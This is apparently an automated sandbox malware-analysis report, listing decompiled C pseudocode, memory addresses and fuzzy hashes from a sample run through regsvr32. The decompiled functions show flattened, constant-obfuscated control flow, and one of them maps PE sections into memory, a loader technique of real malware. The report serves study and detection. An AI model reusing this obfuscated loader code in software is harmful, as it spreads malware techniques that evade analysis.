                                                                                                                0x001b9450
                                                                                                                0x001b9454
                                                                                                                0x001b945b
                                                                                                                0x001b945f
                                                                                                                0x001b9466
                                                                                                                0x001b946d
                                                                                                                0x001b9474
                                                                                                                0x001b947b
                                                                                                                0x001b9487
                                                                                                                0x001b948c
                                                                                                                0x001b9491
                                                                                                                0x001b9498
                                                                                                                0x001b949c
                                                                                                                0x001b94a3
                                                                                                                0x001b94aa
                                                                                                                0x001b94b1
                                                                                                                0x001b94b5
                                                                                                                0x001b94bc
                                                                                                                0x001b94c3
                                                                                                                0x001b94ca
                                                                                                                0x001b94d1
                                                                                                                0x001b94d6
                                                                                                                0x001b94db
                                                                                                                0x001b94e2
                                                                                                                0x001b94e9
                                                                                                                0x001b94f0
                                                                                                                0x001b94f3
                                                                                                                0x001b94fa
                                                                                                                0x001b9501
                                                                                                                0x001b950b
                                                                                                                0x001b950e
                                                                                                                0x001b9511
                                                                                                                0x001b9518
                                                                                                                0x001b951f
                                                                                                                0x001b9526
                                                                                                                0x001b952d
                                                                                                                0x001b952d
                                                                                                                0x001b953f
                                                                                                                0x001b9621
                                                                                                                0x001b962b
                                                                                                                0x00000000
                                                                                                                0x001b962b
                                                                                                                0x001b954b
                                                                                                                0x001b9571
                                                                                                                0x001b957e
                                                                                                                0x001b958e
                                                                                                                0x001b9596
                                                                                                                0x001b95a6
                                                                                                                0x001b95ab
                                                                                                                0x001b95ae
                                                                                                                0x001b95b1
                                                                                                                0x001b95b8
                                                                                                                0x001b95b9
                                                                                                                0x001b95bc
                                                                                                                0x00000000
                                                                                                                0x001b95bc
                                                                                                                0x001b9553
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001b955c
                                                                                                                0x001b9561
                                                                                                                0x001b9561
                                                                                                                0x001b95cd
                                                                                                                0x001b95da
                                                                                                                0x001b95e9
                                                                                                                0x001b95ee
                                                                                                                0x001b95f1
                                                                                                                0x001b95f4
                                                                                                                0x001b95fb
                                                                                                                0x001b95fc
                                                                                                                0x001b95ff
                                                                                                                0x001b9602
                                                                                                                0x001b9602
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 8j$gC
                                                                                                                • API String ID: 0-1253789705
                                                                                                                • Opcode ID: f714318f783c773a54a82f4ff96256ed7bd0b709d11b6202c285b1239b6a41ad
                                                                                                                • Instruction ID: 2a689eaec373b9d6241fee158275f67f209ea4b8f5bab3b54779701ad37333a5
                                                                                                                • Opcode Fuzzy Hash: f714318f783c773a54a82f4ff96256ed7bd0b709d11b6202c285b1239b6a41ad
                                                                                                                • Instruction Fuzzy Hash: CFB103B5D01319ABDF28CFE5D88A9DEBBB1FB44314F208059E225BA254C7B41A46CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001A1DCA Relevance: 2.7, Strings: 2, Instructions: 216COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 91%
                                                                                                                			E001A1DCA(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				unsigned int _v40;
				signed int _v44;
				unsigned int _v48;
				unsigned int _v52;
				signed int _v56;
				unsigned int _v60;
				unsigned int _v64;
				signed int _v68;
				signed int _v72;
				unsigned int _v76;
				void* _t205;
				void* _t209;
				void* _t213;
				void* _t214;
				void* _t218;
				void* _t224;
				void* _t225;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				void* _t253;
				void* _t254;
				unsigned int* _t256;
				void* _t258;

				_t256 =  &_v76;
				_v68 = 0x160c5d;
				_v68 = _v68 + 0xffffdd43;
				_v68 = _v68 ^ 0xbc482250;
				_v68 = _v68 + 0xf314;
				_v68 = _v68 ^ 0xbc5584f4;
				_v72 = 0xe03e76;
				_v72 = _v72 | 0x7b474349;
				_v72 = _v72 ^ 0x63c33ca5;
				_v72 = _v72 * 0x5c;
				_t225 = __ecx;
				_v72 = _v72 ^ 0xad005a31;
				_t253 = 0;
				_v60 = 0x6364a1;
				_t254 = 0xf2b36ca;
				_v60 = _v60 >> 0xb;
				_v60 = _v60 << 0xa;
				_v60 = _v60 >> 0xc;
				_v60 = _v60 ^ 0x000e28d1;
				_v8 = 0x9fbbb6;
				_v8 = _v8 + 0xe1e2;
				_v8 = _v8 ^ 0x00ab94cf;
				_v64 = 0xedfd74;
				_t227 = 0x28;
				_v64 = _v64 / _t227;
				_t228 = 0x6f;
				_v64 = _v64 / _t228;
				_v64 = _v64 >> 6;
				_v64 = _v64 ^ 0x000dd42e;
				_v12 = 0xcfade0;
				_v12 = _v12 ^ 0xbf231f4c;
				_v12 = _v12 ^ 0xbfec5367;
				_v36 = 0x4cc8d1;
				_t229 = 0x38;
				_v36 = _v36 * 0x4c;
				_v36 = _v36 / _t229;
				_v36 = _v36 ^ 0x006943cf;
				_v40 = 0xf7c221;
				_v40 = _v40 + 0x86ca;
				_v40 = _v40 >> 0xf;
				_v40 = _v40 ^ 0x000a9be7;
				_v48 = 0xb28169;
				_v48 = _v48 << 0x10;
				_v48 = _v48 >> 0xd;
				_v48 = _v48 ^ 0x0002e0af;
				_v20 = 0xbdd737;
				_v20 = _v20 + 0xffffc64f;
				_v20 = _v20 ^ 0x00bcc3ac;
				_v52 = 0xd1ed72;
				_v52 = _v52 << 6;
				_v52 = _v52 >> 0xa;
				_v52 = _v52 ^ 0x0003583d;
				_v44 = 0x25b560;
				_t230 = 0x60;
				_v44 = _v44 * 0x12;
				_v44 = _v44 / _t230;
				_v44 = _v44 ^ 0x00008134;
				_v76 = 0x2945d7;
				_t231 = 0x27;
				_v76 = _v76 / _t231;
				_v76 = _v76 + 0xfffffa2f;
				_v76 = _v76 >> 1;
				_v76 = _v76 ^ 0x00039a70;
				_v16 = 0xa23cac;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 ^ 0x00036df9;
				_v28 = 0x4066fa;
				_v28 = _v28 ^ 0x386a85c4;
				_t232 = 0x30;
				_v28 = _v28 / _t232;
				_v28 = _v28 ^ 0x0129e620;
				_v4 = 0x188b00;
				_v4 = _v4 + 0xfffff624;
				_v4 = _v4 ^ 0x00185daa;
				_v32 = 0x74e598;
				_t233 = 0x79;
				_v32 = _v32 / _t233;
				_v32 = _v32 << 0xf;
				_v32 = _v32 ^ 0x7ba7407d;
				_v24 = 0x360535;
				_v24 = _v24 | 0x79da5273;
				_v24 = _v24 >> 8;
				_v24 = _v24 ^ 0x0070d1c0;
				_v56 = 0xfa8463;
				_v56 = _v56 + 0xfffffe8d;
				_v56 = _v56 + 0x73f3;
				_v56 = _v56 ^ 0x186b7fce;
				_v56 = _v56 ^ 0x1891fcd4;
				goto L1;
				do {
					while(1) {
						L1:
						_t258 = _t254 - 0xc6387f2;
						if(_t258 > 0) {
							break;
						}
						if(_t258 == 0) {
							_push(_t233);
							_push(_t233);
							_t213 = E001BED77();
							_t256 =  &(_t256[2]);
							_t254 = 0xbc8bd24;
							_t253 = _t253 + _t213;
							continue;
						} else {
							if(_t254 == 0x219bbc9) {
								_t214 = E001ABF8B(_v68, _t225 + 0x10, _v72);
								_pop(_t233);
								_t253 = _t253 + _t214;
								_t254 = 0xf23c674;
								continue;
							} else {
								if(_t254 == 0x9875614) {
									_push(_t233);
									_push(_t233);
									_t218 = E001BED77();
									_t256 =  &(_t256[2]);
									_t254 = 0xdeb088e;
									_t253 = _t253 + _t218;
									continue;
								} else {
									if(_t254 == 0xae95bad) {
										_t253 = _t253 + E001ABF8B(_v24, _t225 + 0x1c, _v56);
									} else {
										if(_t254 != 0xbc8bd24) {
											goto L17;
										} else {
											_push(_t233);
											_push(_t233);
											_t224 = E001BED77();
											_t256 =  &(_t256[2]);
											_t254 = 0x9875614;
											_t253 = _t253 + _t224;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t253;
					}
					if(_t254 == 0xdeb088e) {
						_push(_t233);
						_push(_t233);
						_t205 = E001BED77();
						_t256 =  &(_t256[2]);
						_t254 = 0xae95bad;
						_t253 = _t253 + _t205;
						goto L17;
					} else {
						if(_t254 == 0xf23c674) {
							_push(_t233);
							_push(_t233);
							_t209 = E001BED77();
							_t256 =  &(_t256[2]);
							_t254 = 0xc6387f2;
							_t253 = _t253 + _t209;
							goto L1;
						} else {
							if(_t254 != 0xf2b36ca) {
								goto L17;
							} else {
								_t254 = 0x219bbc9;
								goto L1;
							}
						}
					}
					goto L20;
					L17:
				} while (_t254 != 0x42fa39a);
				goto L20;
			}








































                                                                                                                0x001a1dca
                                                                                                                0x001a1dcd
                                                                                                                0x001a1dd7
                                                                                                                0x001a1ddf
                                                                                                                0x001a1de7
                                                                                                                0x001a1def
                                                                                                                0x001a1df7
                                                                                                                0x001a1dff
                                                                                                                0x001a1e07
                                                                                                                0x001a1e18
                                                                                                                0x001a1e1c
                                                                                                                0x001a1e1e
                                                                                                                0x001a1e26
                                                                                                                0x001a1e28
                                                                                                                0x001a1e30
                                                                                                                0x001a1e35
                                                                                                                0x001a1e3a
                                                                                                                0x001a1e3f
                                                                                                                0x001a1e44
                                                                                                                0x001a1e4c
                                                                                                                0x001a1e54
                                                                                                                0x001a1e5c
                                                                                                                0x001a1e64
                                                                                                                0x001a1e72
                                                                                                                0x001a1e77
                                                                                                                0x001a1e81
                                                                                                                0x001a1e86
                                                                                                                0x001a1e8c
                                                                                                                0x001a1e91
                                                                                                                0x001a1e99
                                                                                                                0x001a1ea1
                                                                                                                0x001a1ea9
                                                                                                                0x001a1eb1
                                                                                                                0x001a1ebe
                                                                                                                0x001a1ec1
                                                                                                                0x001a1ecd
                                                                                                                0x001a1ed1
                                                                                                                0x001a1ed9
                                                                                                                0x001a1ee1
                                                                                                                0x001a1ee9
                                                                                                                0x001a1eee
                                                                                                                0x001a1ef6
                                                                                                                0x001a1efe
                                                                                                                0x001a1f03
                                                                                                                0x001a1f08
                                                                                                                0x001a1f10
                                                                                                                0x001a1f18
                                                                                                                0x001a1f20
                                                                                                                0x001a1f28
                                                                                                                0x001a1f30
                                                                                                                0x001a1f35
                                                                                                                0x001a1f3a
                                                                                                                0x001a1f42
                                                                                                                0x001a1f4f
                                                                                                                0x001a1f50
                                                                                                                0x001a1f5a
                                                                                                                0x001a1f5e
                                                                                                                0x001a1f66
                                                                                                                0x001a1f7b
                                                                                                                0x001a1f80
                                                                                                                0x001a1f86
                                                                                                                0x001a1f8e
                                                                                                                0x001a1f92
                                                                                                                0x001a1f9a
                                                                                                                0x001a1fa2
                                                                                                                0x001a1fa7
                                                                                                                0x001a1faf
                                                                                                                0x001a1fb7
                                                                                                                0x001a1fc3
                                                                                                                0x001a1fc8
                                                                                                                0x001a1fce
                                                                                                                0x001a1fd6
                                                                                                                0x001a1fde
                                                                                                                0x001a1fe6
                                                                                                                0x001a1fee
                                                                                                                0x001a1ffa
                                                                                                                0x001a1ffd
                                                                                                                0x001a2001
                                                                                                                0x001a2006
                                                                                                                0x001a200e
                                                                                                                0x001a2016
                                                                                                                0x001a201e
                                                                                                                0x001a2023
                                                                                                                0x001a202b
                                                                                                                0x001a2033
                                                                                                                0x001a203b
                                                                                                                0x001a2043
                                                                                                                0x001a204b
                                                                                                                0x001a204b
                                                                                                                0x001a2053
                                                                                                                0x001a2053
                                                                                                                0x001a2053
                                                                                                                0x001a2053
                                                                                                                0x001a2055
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001a205b
                                                                                                                0x001a20f0
                                                                                                                0x001a20f1
                                                                                                                0x001a20f2
                                                                                                                0x001a20f7
                                                                                                                0x001a20fa
                                                                                                                0x001a20ff
                                                                                                                0x00000000
                                                                                                                0x001a2061
                                                                                                                0x001a2067
                                                                                                                0x001a20d2
                                                                                                                0x001a20d7
                                                                                                                0x001a20d8
                                                                                                                0x001a20da
                                                                                                                0x00000000
                                                                                                                0x001a2069
                                                                                                                0x001a206f
                                                                                                                0x001a20b4
                                                                                                                0x001a20b5
                                                                                                                0x001a20b6
                                                                                                                0x001a20bb
                                                                                                                0x001a20be
                                                                                                                0x001a20c3
                                                                                                                0x00000000
                                                                                                                0x001a2071
                                                                                                                0x001a2077
                                                                                                                0x001a2183
                                                                                                                0x001a207d
                                                                                                                0x001a2083
                                                                                                                0x00000000
                                                                                                                0x001a2089
                                                                                                                0x001a2095
                                                                                                                0x001a2096
                                                                                                                0x001a2097
                                                                                                                0x001a209c
                                                                                                                0x001a209f
                                                                                                                0x001a20a4
                                                                                                                0x00000000
                                                                                                                0x001a20a4
                                                                                                                0x001a2083
                                                                                                                0x001a2077
                                                                                                                0x001a206f
                                                                                                                0x001a2067
                                                                                                                0x001a2185
                                                                                                                0x001a218e
                                                                                                                0x001a218e
                                                                                                                0x001a210c
                                                                                                                0x001a2153
                                                                                                                0x001a2154
                                                                                                                0x001a2155
                                                                                                                0x001a215a
                                                                                                                0x001a215d
                                                                                                                0x001a2162
                                                                                                                0x00000000
                                                                                                                0x001a210e
                                                                                                                0x001a2114
                                                                                                                0x001a2134
                                                                                                                0x001a2135
                                                                                                                0x001a2136
                                                                                                                0x001a213b
                                                                                                                0x001a213e
                                                                                                                0x001a2140
                                                                                                                0x00000000
                                                                                                                0x001a2116
                                                                                                                0x001a211c
                                                                                                                0x00000000
                                                                                                                0x001a211e
                                                                                                                0x001a211e
                                                                                                                0x00000000
                                                                                                                0x001a211e
                                                                                                                0x001a211c
                                                                                                                0x001a2114
                                                                                                                0x00000000
                                                                                                                0x001a2164
                                                                                                                0x001a2164
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 1Z$ICG{
                                                                                                                • API String ID: 0-3858990741
                                                                                                                • Opcode ID: 19d7b763f59c274b39ad01ee0b929f100e2e12b0f30b27bb5447f1327c964cb4
                                                                                                                • Instruction ID: 833390c8559e7fd759ff7766618336521e52177e4cb406671957d0b2c7bfca9d
                                                                                                                • Opcode Fuzzy Hash: 19d7b763f59c274b39ad01ee0b929f100e2e12b0f30b27bb5447f1327c964cb4
                                                                                                                • Instruction Fuzzy Hash: 379166B29093409FC358CF28D98A40BFBE1BBD6758F408A1DF59997260D7B6D909CF02
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001C05F6 Relevance: 2.7, Strings: 2, Instructions: 166COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 92%
                                                                                                                			E001C05F6(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t153;
				signed int _t165;
				void* _t167;
				intOrPtr* _t169;
				void* _t171;
				void* _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				void* _t194;
				signed int* _t196;

				_push(_a16);
				_t169 = __edx;
				_t194 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AC98A(_t153);
				_v12 = 0xa85a8d;
				_t188 = 0;
				_v4 = _v4 & 0;
				_t196 =  &(( &_v80)[6]);
				_v8 = 0x8979c1;
				_v20 = 0x4aeb00;
				_t171 = 0x9e12010;
				_v20 = _v20 ^ 0xf6151ecc;
				_v20 = _v20 ^ 0xf65ff5ce;
				_v60 = 0xdae2a;
				_v60 = _v60 + 0xffff96ee;
				_v60 = _v60 ^ 0xc16cefcc;
				_v60 = _v60 ^ 0xc161aac4;
				_v68 = 0xc4b904;
				_v68 = _v68 << 0xf;
				_v68 = _v68 << 0xb;
				_v68 = _v68 ^ 0x50000000;
				_v48 = 0x1c7791;
				_v48 = _v48 + 0xcf7c;
				_t189 = 0x48;
				_v48 = _v48 / _t189;
				_v48 = _v48 ^ 0x00027b2e;
				_v52 = 0x7c90ac;
				_v52 = _v52 >> 0xb;
				_t190 = 3;
				_v52 = _v52 / _t190;
				_v52 = _v52 ^ 0x000acdf0;
				_v56 = 0xf2a3a1;
				_v56 = _v56 + 0xc92d;
				_v56 = _v56 + 0xd1bb;
				_v56 = _v56 ^ 0x00f655dc;
				_v80 = 0x4c0523;
				_v80 = _v80 + 0xffffbf0c;
				_v80 = _v80 ^ 0xf30a28ba;
				_v80 = _v80 | 0x31c49b93;
				_v80 = _v80 ^ 0xf3cbca4f;
				_v64 = 0xfad75c;
				_v64 = _v64 ^ 0x62962a52;
				_v64 = _v64 + 0xfe0c;
				_v64 = _v64 ^ 0x626b4f05;
				_v24 = 0xc167a5;
				_t191 = 0x45;
				_v24 = _v24 * 0x35;
				_v24 = _v24 ^ 0x28065125;
				_v28 = 0x5e223;
				_v28 = _v28 | 0xef64f213;
				_v28 = _v28 ^ 0xef629db8;
				_v72 = 0x39d48;
				_v72 = _v72 + 0xf26c;
				_v72 = _v72 / _t191;
				_v72 = _v72 ^ 0x0000de3d;
				_v32 = 0xaf61bc;
				_v32 = _v32 | 0x812c8077;
				_v32 = _v32 ^ 0x81ac983d;
				_v36 = 0xb1d15a;
				_v36 = _v36 + 0xffff08fc;
				_v36 = _v36 ^ 0x00b940a9;
				_v40 = 0x40f696;
				_t192 = 0x37;
				_v40 = _v40 / _t192;
				_v40 = _v40 ^ 0x0003b294;
				_v76 = 0xa44738;
				_v76 = _v76 << 0xf;
				_v76 = _v76 ^ 0x0bf6f790;
				_v76 = _v76 * 0x2f;
				_v76 = _v76 ^ 0x6ba8cd0d;
				_v16 = 0x7d78eb;
				_v16 = _v16 << 8;
				_v16 = _v16 ^ 0x7d7abd51;
				_t193 = _v16;
				_v44 = 0x100367;
				_v44 = _v44 >> 8;
				_v44 = _v44 << 4;
				_v44 = _v44 ^ 0x000a0a22;
				do {
					while(_t171 != 0x9e12010) {
						if(_t171 == 0xb3598c5) {
							_t165 = E001BA50A(_v48, _v20, _v52, _v56, _v60, _v80, _v64, _v68, _t171, _v24, 0, _v28, _t194);
							_t193 = _t165;
							_t196 =  &(_t196[0xc]);
							if(_t165 != 0xffffffff) {
								_t171 = 0xdca968c;
								continue;
							}
						} else {
							if(_t171 == 0xdca968c) {
								_t167 = E001A7E8A(_t169 + 4, _t193, _v72, _v32, _t169 + 4, _v36,  *_t169, _v40,  *((intOrPtr*)(_t169 + 4)));
								_t196 =  &(_t196[7]);
								_t188 = _t167;
								_t171 = 0xf4cf9fa;
								continue;
							} else {
								if(_t171 != 0xf4cf9fa) {
									goto L11;
								} else {
									E001B02D8(_t193, _v76, _v16, _v44);
								}
							}
						}
						L6:
						return _t188;
					}
					_t171 = 0xb3598c5;
					L11:
				} while (_t171 != 0xa5afb41);
				goto L6;
			}



































                                                                                                                0x001c05fd
                                                                                                                0x001c0601
                                                                                                                0x001c0603
                                                                                                                0x001c0605
                                                                                                                0x001c0609
                                                                                                                0x001c060d
                                                                                                                0x001c0611
                                                                                                                0x001c0612
                                                                                                                0x001c0613
                                                                                                                0x001c0618
                                                                                                                0x001c0620
                                                                                                                0x001c0622
                                                                                                                0x001c0626
                                                                                                                0x001c0629
                                                                                                                0x001c0633
                                                                                                                0x001c063b
                                                                                                                0x001c0640
                                                                                                                0x001c0648
                                                                                                                0x001c0650
                                                                                                                0x001c0658
                                                                                                                0x001c0660
                                                                                                                0x001c0668
                                                                                                                0x001c0670
                                                                                                                0x001c0678
                                                                                                                0x001c067d
                                                                                                                0x001c0682
                                                                                                                0x001c068a
                                                                                                                0x001c0692
                                                                                                                0x001c06a0
                                                                                                                0x001c06a5
                                                                                                                0x001c06ab
                                                                                                                0x001c06b3
                                                                                                                0x001c06bb
                                                                                                                0x001c06c4
                                                                                                                0x001c06c9
                                                                                                                0x001c06cf
                                                                                                                0x001c06d7
                                                                                                                0x001c06df
                                                                                                                0x001c06e7
                                                                                                                0x001c06ef
                                                                                                                0x001c06f7
                                                                                                                0x001c06ff
                                                                                                                0x001c0707
                                                                                                                0x001c070f
                                                                                                                0x001c0717
                                                                                                                0x001c071f
                                                                                                                0x001c0727
                                                                                                                0x001c072f
                                                                                                                0x001c0737
                                                                                                                0x001c073f
                                                                                                                0x001c074c
                                                                                                                0x001c074d
                                                                                                                0x001c0751
                                                                                                                0x001c0759
                                                                                                                0x001c0761
                                                                                                                0x001c0769
                                                                                                                0x001c0771
                                                                                                                0x001c0779
                                                                                                                0x001c0787
                                                                                                                0x001c078b
                                                                                                                0x001c0793
                                                                                                                0x001c079b
                                                                                                                0x001c07a3
                                                                                                                0x001c07ab
                                                                                                                0x001c07b3
                                                                                                                0x001c07bd
                                                                                                                0x001c07c5
                                                                                                                0x001c07d3
                                                                                                                0x001c07d6
                                                                                                                0x001c07da
                                                                                                                0x001c07e2
                                                                                                                0x001c07ea
                                                                                                                0x001c07ef
                                                                                                                0x001c07fc
                                                                                                                0x001c0800
                                                                                                                0x001c0808
                                                                                                                0x001c0810
                                                                                                                0x001c0815
                                                                                                                0x001c081d
                                                                                                                0x001c0821
                                                                                                                0x001c0829
                                                                                                                0x001c082e
                                                                                                                0x001c0833
                                                                                                                0x001c083b
                                                                                                                0x001c083b
                                                                                                                0x001c084d
                                                                                                                0x001c08d9
                                                                                                                0x001c08de
                                                                                                                0x001c08e0
                                                                                                                0x001c08e6
                                                                                                                0x001c08e8
                                                                                                                0x00000000
                                                                                                                0x001c08e8
                                                                                                                0x001c084f
                                                                                                                0x001c0855
                                                                                                                0x001c089c
                                                                                                                0x001c08a1
                                                                                                                0x001c08a4
                                                                                                                0x001c08a6
                                                                                                                0x00000000
                                                                                                                0x001c0857
                                                                                                                0x001c085d
                                                                                                                0x00000000
                                                                                                                0x001c0863
                                                                                                                0x001c0871
                                                                                                                0x001c0877
                                                                                                                0x001c085d
                                                                                                                0x001c0855
                                                                                                                0x001c0878
                                                                                                                0x001c0881
                                                                                                                0x001c0881
                                                                                                                0x001c08f2
                                                                                                                0x001c08f7
                                                                                                                0x001c08f7
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: "$x}
                                                                                                                • API String ID: 0-146941907
                                                                                                                • Opcode ID: a127a5fe5477d2b72d35e0e762179c02e217160014e532ff9ca0c06a32aaf90b
                                                                                                                • Instruction ID: d440c9a83e05d10e131b207213c3027c80394e47b4b21a34644e046764ed6e4d
                                                                                                                • Opcode Fuzzy Hash: a127a5fe5477d2b72d35e0e762179c02e217160014e532ff9ca0c06a32aaf90b
                                                                                                                • Instruction Fuzzy Hash: 61713272409300ABC759CF65C94991BBBF2FBC4B58F509A0DF69156220D3B5C909CF83
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001B3E89 Relevance: 2.7, Strings: 2, Instructions: 156COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 92%
                                                                                                                			E001B3E89(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a12, intOrPtr _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* _t151;
				void* _t162;
				void* _t172;
				void* _t174;
				signed int _t176;
				void* _t192;
				void* _t197;
				signed int* _t201;
				signed int* _t202;
				signed int* _t203;

				_push(_a16);
				_t199 = _a12;
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AC98A(_t151);
				_v36 = 0xbd5fd1;
				_v36 = _v36 + 0xd5a5;
				_t176 = 0x55;
				_v36 = _v36 * 0x6e;
				_v36 = _v36 ^ 0x51bae8b4;
				_v40 = 0x185593;
				_v40 = _v40 >> 0x10;
				_v40 = _v40 + 0xffffcfa0;
				_v40 = _v40 ^ 0xffffefb8;
				_v32 = 0xdcd1a7;
				_v32 = _v32 + 0xec0f;
				_v32 = _v32 + 0xffff95d1;
				_v32 = _v32 ^ 0x00dd53c7;
				_v44 = 0xaa718a;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 >> 0xe;
				_v44 = _v44 ^ 0x00083461;
				_v68 = 0x96d1ce;
				_v68 = _v68 | 0xfa6bffff;
				_v68 = _v68 >> 0xd;
				_v68 = _v68 ^ 0x000d7337;
				_v16 = 0x5389c;
				_v16 = _v16 * 0x43;
				_v16 = _v16 ^ 0x015fd144;
				_v48 = 0x5c7317;
				_v48 = _v48 + 0x2561;
				_v48 = _v48 >> 4;
				_v48 = _v48 ^ 0x000c68f4;
				_v28 = 0x8ef4ad;
				_v28 = _v28 ^ 0xa976e87b;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x153dfc46;
				_v60 = 0x8a842;
				_v60 = _v60 ^ 0xdacadb1b;
				_v60 = _v60 | 0xa04112f3;
				_v60 = _v60 << 0xf;
				_v60 = _v60 ^ 0xb9f08aa1;
				_v64 = 0xd1270a;
				_v64 = _v64 + 0xbf80;
				_v64 = _v64 | 0x6afaafef;
				_v64 = _v64 ^ 0x6af66c1f;
				_v12 = 0x1fa114;
				_v12 = _v12 * 0x49;
				_v12 = _v12 ^ 0x090ed9d7;
				_v4 = 0x9c35f;
				_v4 = _v4 * 0x51;
				_v4 = _v4 ^ 0x0311d9d7;
				_v56 = 0x814c44;
				_v56 = _v56 << 7;
				_v56 = _v56 / _t176;
				_v56 = _v56 + 0xffffc6bb;
				_v56 = _v56 ^ 0x00c0ba42;
				_v8 = 0x6e86c8;
				_v8 = _v8 + 0xffffea82;
				_v8 = _v8 ^ 0x006e5917;
				_v20 = 0x646204;
				_v20 = _v20 * 0x2e;
				_v20 = _v20 * 0x79;
				_v20 = _v20 ^ 0x8682de61;
				_v52 = 0xb78ba6;
				_v52 = _v52 | 0x1172f08c;
				_v52 = _v52 + 0xffff11ae;
				_v52 = _v52 * 0xe;
				_v52 = _v52 ^ 0xfb877c4c;
				_v24 = 0x8957ec;
				_v24 = _v24 << 0x10;
				_v24 = _v24 + 0xffff1064;
				_v24 = _v24 ^ 0x57e46da3;
				_t177 = _v44;
				_t162 = E001B24A1(_v44, _v68, _a12, _v16, _v48);
				_t172 = _t162;
				_t201 =  &(( &_v68)[9]);
				if(_t172 != 0) {
					_t192 = E001A427C(_v28, _v60, _v32, _v64, _t177, _v12,  *((intOrPtr*)(_t172 + 0x50)), _v40 | _v36);
					_t202 =  &(_t201[6]);
					if(_t192 == 0) {
						L6:
						return _t192;
					}
					E001BFD42( *((intOrPtr*)(_t172 + 0x54)), _v4,  *_t199, _v56, _t192, _v8);
					_t203 =  &(_t202[4]);
					_t197 = ( *(_t172 + 0x14) & 0x0000ffff) + 0x18 + _t172;
					_t174 = ( *(_t172 + 6) & 0x0000ffff) * 0x28 + _t197;
					while(_t197 < _t174) {
						_t181 =  <  ?  *((void*)(_t197 + 8)) :  *((intOrPtr*)(_t197 + 0x10));
						E001BFD42( <  ?  *((void*)(_t197 + 8)) :  *((intOrPtr*)(_t197 + 0x10)), _v20,  *_t199 +  *((intOrPtr*)(_t197 + 0x14)), _v52,  *((intOrPtr*)(_t197 + 0xc)) + _t192, _v24);
						_t203 =  &(_t203[4]);
						_t197 = _t197 + 0x28;
					}
					goto L6;
				}
				return _t162;
			}






























                                                                                                                0x001b3e8e
                                                                                                                0x001b3e92
                                                                                                                0x001b3e96
                                                                                                                0x001b3e97
                                                                                                                0x001b3e99
                                                                                                                0x001b3e9d
                                                                                                                0x001b3e9e
                                                                                                                0x001b3e9f
                                                                                                                0x001b3ea4
                                                                                                                0x001b3eae
                                                                                                                0x001b3ebd
                                                                                                                0x001b3ebe
